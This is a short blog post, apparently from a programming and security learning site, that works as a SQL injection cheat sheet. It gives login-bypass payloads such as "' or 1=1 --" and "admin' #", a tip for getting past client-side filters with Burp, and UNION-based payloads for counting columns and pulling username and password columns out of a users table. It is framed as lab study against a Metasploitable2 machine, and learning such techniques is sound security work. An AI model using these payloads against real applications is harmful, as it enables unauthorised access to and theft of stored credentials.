Welcome To computerwebooo

A learning resource of Computer Programming and Cyber Security.

SQL Injection

Abhishek kumar May 05, 2020

👄email us


$ mysql -u root -h 10.0.2.4

command for remote access of mysql database where -u is user and -h is host , here i m trying to access my metasploitable2 machine
Gifts'+OR+1=1-- to retrive any data from url
----------------------------------------------------------------------------------------------
Default login statement       (# and -- are two commenting method)
SELECT * FROM account WHERE username='$admin' AND password='$password'
bypass $password -------:   (1234' or 1=1 --),(1234' or 1=1 #)
we can also inject our code on $admin parameter then we don't need to add any password 
injecting in $admin ------: (admin' #), (admin' --)
to get all user name write in $admin field-----: (' or 1='1)

If the client is secure and applying filter on client side then it is easy to bypass using proxy(Burp).
we just not have to apply any special character at the browser (use random user and password), then apply some millicious code on the proxy (in params) then forward.
---------------------------------------------------------------------------------------------------

UNION ATTACK

# in url %23
 use in burp suite at repeater section  at the place of space
space( ) in url %20
'$username' ORDER BY 1 #  
we can also use this instead of order by statement, the no of null should be the no of column.
' UNION SELECT NULL-- 
we can insert order by statement in url (because it is get request exploit )to know the no of column in current database (account database) like 
SELECT * FROM account WHERE username='$admin'  ORDER BY 5 #AND password='$password'
if it will not show error, it means account have 5 column, and if we get error then we have to try another no until i did not get error 
' UNION SELECT NULL FROM DUAL--  in oracle there must be an form statement in every select statement, DUAL is build in function in oracle database, and in oracle BANNER is used to shoe the database 


' UNION SELECT NULL,NULL,NULL,'a'-- used for finding the no of column contain string type, by replacing 'a' on every null place

' UNION SELECT username, password FROM users-- to retrive data from users table if we know the column name and table name

' UNION SELECT username || '~' || password FROM users-- to retrive data from multiple value in single column if there is only one string column in original quaries.

Tags
Reactions

Post a Comment

0 Comments